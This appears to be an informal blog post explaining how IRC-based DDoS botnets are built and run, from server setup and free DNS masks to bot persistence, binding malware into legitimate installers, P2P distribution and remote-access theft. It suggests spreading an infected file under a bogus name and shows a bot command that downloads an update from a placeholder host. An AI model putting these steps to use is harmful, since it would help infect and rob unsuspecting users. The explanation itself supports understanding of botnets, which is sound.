So a little bit ago, must have been last year judging now, I was into what some call “Botnet Hunting”. As in, I would go and search for active malicious botnets, pretend to be a bot, connect, and wait out on the server to see what was going on and what information I could gather.
To understand what I was doing, there is first the concept of what a botnet is and consists of. I will specifically be talking of DDoS botnets. Every botnet starts with a person, or botnet herder. The bot herder starts by setting up an IRC server. IRC is an acronym for Internet Relay Chat, a fairly common messaging protocol based around chat on servers, and networks of servers (Such as the elcycle chat). Think chatrooms, but with much more control and capability. So, the bot herder sets up a server and configures it to not be picked up by any IRC indexing services that could expose the server to the general public in any way. Once the server is setup, the bot herder acquires a (usually free) DNS mask. The DNS mask will take the server’s Ip (internet protocol) address and give it something similar to a domain name for connection. Free ones are usually chosen from services such as No-Ip or DynDNS and are used in a temporary fashion. Nothing of the bot herder’s personal information is left with the service, because they are free.
Next, the bot herder works on the bot code. Commonly, sources are taken and modified to the herder’s liking, but sometimes these bot codes are made from scratch. Common bot scripts are created and compiled in C++ though I have seen some in other languages. The purpose of this code is to connect the victim’s machine to the irc server the bot herder had set up, and assign it a nickname based on the OS of the infected computer, as well as a number (Either random or based on the victim’s location, for example a bot nick could be “XP|73590257”). This bot code is very lightweight, designed to hide from anti-virus programs, set to run every time the computer restarts, and embedded into the registry. It would not be a surprise if you had one of these bots infecting you with no knowledge.
After the bot code is compiled into an executable ( a .exe file). The malicious file is then usually bound to another legit executable. For example, this bot file could be hidden within a Firefox installer and be launched covertly when you try to install firefox. Because of the design, you would be unaware the bot code was even being run. The binders that combine the executables are also easily found and used. Some of the programs that bot herders use come with Windows distros and are expected to be used to make install packages for mass updates.
The hardest step is distribution of the infected file. Thankfully, there are many unintelligent internet users who will blindly download and install anything as long as they think it will do what they desire. Consider releasing this application on a P2P network (Limewire, Kazaa) with a bogus name and having victims willingly download.
Once they download and run the file, that’s all it takes. The bot infects the computer, hides itself, covers its tracks, and then connects to the IRC server. Sometimes, these bots are a bit more sophisticated and can contain a RAT (Remote Access Trojan). This bot herder could gain full control of the victim’s machine, and take things like stored internet logs and credit card numbers, as well as send a copy of itself to everyone in the computer’s email address book.
Once on the IRC server, the bot joins a channel (room) and waits. The bot herder then goes to this room whenever he/she pleases and takes controls of the bots using several commands (these commands usually start with a period, for example “.upgrade http://xxxxx.com/botupdatefilename.xxx"). The main purpose of these bots is Distributed Denial of Service attacks on servers. The bot herder will issue a command to all the bots and tell them to all ping a single server. The amount of ping the server gets is too great, and causes the server to lock up and go offline. The more bots there are, the quicker this will happen. Some botnets have been found to have populations in the area of hundreds of thousands and could render a server useless quickly.
The bot herder does not always restrict this botnet to self-use, and can offer services to other groups in exchange for information, stolen passwords, money, etc. Botnets have also been used recently against various websites that deal with scientology.